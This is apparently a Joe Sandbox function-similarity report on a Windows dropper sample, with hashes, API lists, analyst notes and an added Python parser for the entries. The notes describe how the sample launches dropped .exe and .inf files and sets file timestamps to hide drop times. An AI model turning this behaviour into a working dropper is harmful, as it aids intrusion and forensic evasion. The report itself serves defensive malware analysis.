                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                  • String ID:
                                                  • API String ID: 3340455307-0
                                                  • Opcode ID: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
                                                  • Instruction ID: 9e6c6c1caea7236712f9481e8bce721bfe36a970f090002e8478b2d6cdd05c44
                                                  • Opcode Fuzzy Hash: 70d0a199513ddd0303306b6c1f9c9cd84068436a56a79b22c40158a956f58a9a
                                                  • Instruction Fuzzy Hash: D7410922F2565286FA64DF11B9627692252FBC4785F044034DE8DCB796CE3CE4C2C704

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                  • API String ID: 1496594111-2013832382
                                                  • Opcode ID: f7f2a11762ce96c0b678dc2ee5f4093b28e28463b6618f01c06ebafbf4af03a3
                                                  • Instruction ID: 6c0e133e16d6708edc4f32919ba32f66293f704f3e0c79e017ed93cc5605f5b4
                                                  • Opcode Fuzzy Hash: f7f2a11762ce96c0b678dc2ee5f4093b28e28463b6618f01c06ebafbf4af03a3
                                                  • Instruction Fuzzy Hash: F8323C31A19B8299EB119FA0F8611E933B4FF48355F500276DA8E877A5EF3CE295C344
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9D8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CA9D8F8D
                                                  • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CA9D9F75
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9DA42F
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9DA435
                                                    • Part of subcall function 00007FF6CA9E0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CA9E0B44), ref: 00007FF6CA9E0BE9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                  • API String ID: 3629253777-3268106645
                                                  • Opcode ID: e9373c6c8447d3f6bd3ca8f7216f9b88ee08b61aa473e508913f217581450698
                                                  • Instruction ID: ddd0aab10df0a2d59dd0e151f093bec4949e8f1b07ab0da13436d91f5aec9ef1
                                                  • Opcode Fuzzy Hash: e9373c6c8447d3f6bd3ca8f7216f9b88ee08b61aa473e508913f217581450698
                                                  • Instruction Fuzzy Hash: 56621222F2968685EB10DF68E4662BD7361FB40B89F804175DA8DC7AD6EF3CE585C340

                                                   Control-flow Graph
                                                   • Function entry: 7ff6ca9f1900 (the rendered graph and its executed/not-executed colouring did not survive extraction; only the call names from the edge list are recoverable)
                                                   • API calls on the graph: LoadLibraryExA, GetLastError, FreeLibrary, GetProcAddress, RaiseException
                                                   • Internal subcalls: 7ff6ca9f1558, 7ff6ca9f1868
                                                   • Note: LoadLibraryExA followed by GetProcAddress, with RaiseException on either failure, is the shape of the CRT delay-load helper, which matches the DloadSection entries in this function's API ID; it is runtime support, not sample-specific logic
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                  • String ID: H
                                                  • API String ID: 3432403771-2852464175
                                                  • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                  • Instruction ID: ce2d9c4e3d55c3c10452cdc56caaab7c09180db86fc34508a243aa49f0aafd3c
                                                  • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                  • Instruction Fuzzy Hash: 51917C32E14B528AEB44CFA5E8552AC33B0FB08B9AF144079EE8E97745EF38E445C340

                                                   Control-flow Graph
                                                   • Function entry: 7ff6ca9ef4e0 (rendered graph and executed/not-executed colouring lost in extraction; call names recovered from the edge list)
                                                   • API calls on the graph: ShellExecuteExW, IsWindowVisible, ShowWindow, WaitForInputIdle, GetExitCodeProcess, CloseHandle
                                                   • Internal subcalls: 7ff6ca9c1fa0, 7ff6ca9f2320, 7ff6ca9f3cf0, 7ff6ca9d63ac, 7ff6ca9e13c4, 7ff6ca9f797c, 7ff6ca9c129c, 7ff6ca9d32a8, 7ff6ca9d5b60, 7ff6ca9efe24, 7ff6ca9f220c, 7ff6ca9f7904
                                                   • Note: together with this function's String ID (.exe, .inf, Install) this is the routine that hands a dropped .exe or .inf to ShellExecuteExW, waits on the child (WaitForInputIdle, GetExitCodeProcess) and closes its handle; child processes of the sample spawned after extraction should be traced back here
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                  • String ID: .exe$.inf$Install$p
                                                  • API String ID: 148627002-3607691742
                                                  • Opcode ID: f52464fe41ae4eeaf1096cca7aaec2d6b818bf4fb3230a7d8fb94f8b8e2b6917
                                                  • Instruction ID: cc5c5f229108c148d3e48b7492ab282bee824e4acd601f581cd32281b77c445b
                                                  • Opcode Fuzzy Hash: f52464fe41ae4eeaf1096cca7aaec2d6b818bf4fb3230a7d8fb94f8b8e2b6917
                                                  • Instruction Fuzzy Hash: 4DC1B122F28A4295FB10CF65F9652792371BF88B82F0441B6DA8EC76A7DF3DE5518340
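The Similarity blocks in this section (API ID, String ID, API String ID, Opcode ID, Instruction ID and the two fuzzy hashes) and the APIs bullets ("name.MODULE(args), ref: address", sometimes prefixed with "Part of subcall function") follow a fixed layout, so they can be pulled out of the report text and queried: every function that carries a given string or API reference, the RVA of a call site for IDA, or the Opcode IDs two reports have in common. The parser below is an added example and is not Joe Sandbox code; the record layout, the helper names (parse_entries, find_by_string, find_by_api, shared_opcode_ids, ref_rva) and the rule that an entry ends at its Instruction Fuzzy Hash bullet are this example's own assumptions. SAMPLE is a constructed excerpt copied from two of the entries on this page.

```python
"""Parse the Joe Sandbox function-similarity entries above and query them.
Added example, not Joe Sandbox code: record layout, helper names and parsing
rules are assumptions inferred from the report's bullet labels.  SAMPLE is a
constructed excerpt copied from two entries on this page."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

SAMPLE = """\
APIs
  • Part of subcall function 00007FF6CA9D8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CA9D8F8D
• _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CA9D9F75
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9DA42F
  • Part of subcall function 00007FF6CA9E0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CA9E0B44), ref: 00007FF6CA9E0BE9
Memory Dump Source
• Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
• String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
• API String ID: 3629253777-3268106645
• Opcode ID: e9373c6c8447d3f6bd3ca8f7216f9b88ee08b61aa473e508913f217581450698
• Instruction ID: ddd0aab10df0a2d59dd0e151f093bec4949e8f1b07ab0da13436d91f5aec9ef1
• Opcode Fuzzy Hash: e9373c6c8447d3f6bd3ca8f7216f9b88ee08b61aa473e508913f217581450698
• Instruction Fuzzy Hash: 56621222F2968685EB10DF68E4662BD7361FB40B89F804175DA8DC7AD6EF3CE585C340
Control-flow Graph
Similarity
• API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
• String ID: .exe$.inf$Install$p
• API String ID: 148627002-3607691742
• Opcode ID: f52464fe41ae4eeaf1096cca7aaec2d6b818bf4fb3230a7d8fb94f8b8e2b6917
• Instruction ID: cc5c5f229108c148d3e48b7492ab282bee824e4acd601f581cd32281b77c445b
• Opcode Fuzzy Hash: f52464fe41ae4eeaf1096cca7aaec2d6b818bf4fb3230a7d8fb94f8b8e2b6917
• Instruction Fuzzy Hash: 4DC1B122F28A4295FB10CF65F9652792371BF88B82F0441B6DA8EC76A7DF3DE5518340
"""

# "• name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR:"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# "• Key: value" bullets of the Memory Dump Source and Similarity blocks
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*)$")

ApiCall = namedtuple("ApiCall", "name module ref subcall_of")  # subcall_of: containing callee or None


@dataclass
class FunctionEntry:
    api_calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def opcode_id(self):
        return self.fields.get("Opcode ID")

    @property
    def strings(self):
        # The report joins strings with '$'; a literal '$' inside a string is
        # indistinguishable from a separator, so empty pieces are dropped.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def ref_rva(self, ref):
        # Call site minus the dump's Offset: the RVA to look up in IDA when the
        # dump is flagged "based on PE: true".
        return int(ref, 16) - int(self.fields["Offset"], 16)


def parse_entries(text):
    entries, cur = [], FunctionEntry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.api_calls.append(ApiCall(m["name"], m["module"], m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue                      # section headings, graph residue, blanks
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":          # "<dump>.sdmp, Offset: <base>, based on PE: true"
            cur.fields[key] = val.split(",")[0]
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", val)
            if off:
                cur.fields["Offset"] = off.group(1)
        else:
            cur.fields[key] = val
        if key == "Instruction Fuzzy Hash":   # last bullet of a Similarity block
            entries.append(cur)
            cur = FunctionEntry()
    return entries


def find_by_string(entries, needle):
    """Entries whose String ID contains `needle` (e.g. '.inf')."""
    return [e for e in entries if any(needle in s for s in e.strings)]


def find_by_api(entries, api_name):
    """Entries that reach `api_name` directly or through a listed subcall."""
    return [e for e in entries if any(c.name == api_name for c in e.api_calls)]


def shared_opcode_ids(a, b):
    """Opcode IDs present in both parsed reports, i.e. a function body reused."""
    return ({e.opcode_id for e in a} & {e.opcode_id for e in b}) - {None}


def parse_sample():
    return parse_entries(SAMPLE)
```

Feed the whole report text to parse_entries and compare two samples with shared_opcode_ids to separate a reused stub from the code that is specific to one sample. ref_rva only works for entries whose Memory Dump Source line was present in the text; Opcode IDs and String IDs are compared as printed and are not re-derived from code bytes.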

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                  • String ID:
                                                  • API String ID: 3569833718-0
                                                  • Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                  • Instruction ID: 9c38629799899076cbf99d6ea6366b7a80b8901e3594489e2c3827c1f0685242
                                                  • Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                  • Instruction Fuzzy Hash: CC41E331B1464286F720CFA2F824BA92770FB89B9AF440275DD8E87B95CF3DD4968744
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3668304517-0
                                                  • Opcode ID: 2b7cf89fae77d1b38b76451e9b19ed7b8d05d4ba88469d1939a18fabe5b124cf
                                                  • Instruction ID: 09a18e8bfb09eab51daa59405770c25ac517b5c557c4610c8ec8b3112b2e9bf7
                                                  • Opcode Fuzzy Hash: 2b7cf89fae77d1b38b76451e9b19ed7b8d05d4ba88469d1939a18fabe5b124cf
                                                  • Instruction Fuzzy Hash: 9B12E062F28B4184EB10EF64E4662BD2371EB447A9F504276DA9DD7ADADF3CD186C300

                                                   Control-flow Graph
                                                   • Function entry: 7ff6ca9d24c0 (rendered graph and executed/not-executed colouring lost in extraction; call names recovered from the edge list)
                                                   • API calls on the graph: CreateFileW, GetLastError, SetFileTime (a second CreateFileW/GetLastError pair sits on the error path of the first CreateFileW)
                                                   • Internal subcalls: 7ff6ca9d6a0c, 7ff6ca9f2320, 7ff6ca9c20b0, 7ff6ca9f220c, 7ff6ca9f7904
                                                   • Note: SetFileTime is applied after the file is created, so the timestamps of files this routine writes are set by the sample and will not reflect the time they were dropped on disk; rely on $MFT/USN or sandbox file events rather than the file's own times
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 3536497005-0
                                                  • Opcode ID: 19081f07b04ed34faab68774849f12bc4f8b326dabedcfb758f4ed5384e6b2c2
                                                  • Instruction ID: b7e9210a45f2448aa2a38e0ec6be28bd49a7c83e243a1c16e2023e49c5776955
                                                  • Opcode Fuzzy Hash: 19081f07b04ed34faab68774849f12bc4f8b326dabedcfb758f4ed5384e6b2c2
                                                  • Instruction Fuzzy Hash: 0D610376E2878185EB208F29F51536E67A1BB847A8F100335DEEA83AD5CF3DD095C704

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                  • String ID:
                                                  • API String ID: 3621893840-0
                                                  • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                  • Instruction ID: 091ea4a0fc28fc76a190629bdc2108dc6864db5f6953b620c0d4b4a8c728fbcc
                                                  • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                  • Instruction Fuzzy Hash: AEF06221B3854682F7208F65F479B362221FFE4B06F841170E98FC2895DE3CE19AC700

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                  • String ID:
                                                  • API String ID: 1266772231-0
                                                  • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                  • Instruction ID: 40060cbf230e37369abf6dae01dcd638545139fb3f77fe6358e7854a32659035
                                                  • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                  • Instruction Fuzzy Hash: 7DF03C32A3854282FB609F61F8A9A366361BFE0B06F845175E98EC2864DF3CD159CB00

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                  • String ID: EDIT
                                                  • API String ID: 4243998846-3080729518
                                                  • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                  • Instruction ID: 0e65a09ec380874c5683a07ed293d36cecd564cba0e1c6c750dd9419616cc192
                                                  • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                  • Instruction Fuzzy Hash: 03016261B28A8781FE309F62B8357F563A0BFA8742F441171C98DC7796DE3CD14A8640

                                                   Control-flow Graph
                                                   • Function entry: 7ff6ca9d2ce0 (rendered graph and executed/not-executed colouring lost in extraction; call names recovered from the edge list)
                                                   • API calls on the graph: GetStdHandle, WriteFile (two call sites)
                                                   • Internal subcalls: 7ff6ca9f2320, 7ff6ca9cb4f8, 7ff6ca9f797c, 7ff6ca9c129c, 7ff6ca9cbca8, 7ff6ca9f220c, 7ff6ca9f7904
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$Handle
                                                  • String ID:
                                                  • API String ID: 4209713984-0

                                                  Control-flow Graph

                                                  APIs
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                  • String ID:
                                                  • API String ID: 2912839123-0
                                                  APIs
                                                  Similarity
                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 1452418845-0
                                                  APIs
                                                  Similarity
                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 2359106489-0
                                                  APIs
                                                  Similarity
                                                  • API ID: ErrorLast$FileHandleRead
                                                  • String ID:
                                                  • API String ID: 2244327787-0
                                                  APIs
                                                    • Part of subcall function 00007FF6CA9DECD8: ResetEvent.KERNEL32 ref: 00007FF6CA9DECF1
                                                    • Part of subcall function 00007FF6CA9DECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6CA9DED07
                                                  • ReleaseSemaphore.KERNEL32 ref: 00007FF6CA9DE974
                                                  • CloseHandle.KERNELBASE ref: 00007FF6CA9DE993
                                                  • DeleteCriticalSection.KERNEL32 ref: 00007FF6CA9DE9AA
                                                  • CloseHandle.KERNEL32 ref: 00007FF6CA9DE9B7
                                                    • Part of subcall function 00007FF6CA9DEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6CA9DE95F,?,?,?,00007FF6CA9D463A,?,?,?), ref: 00007FF6CA9DEA63
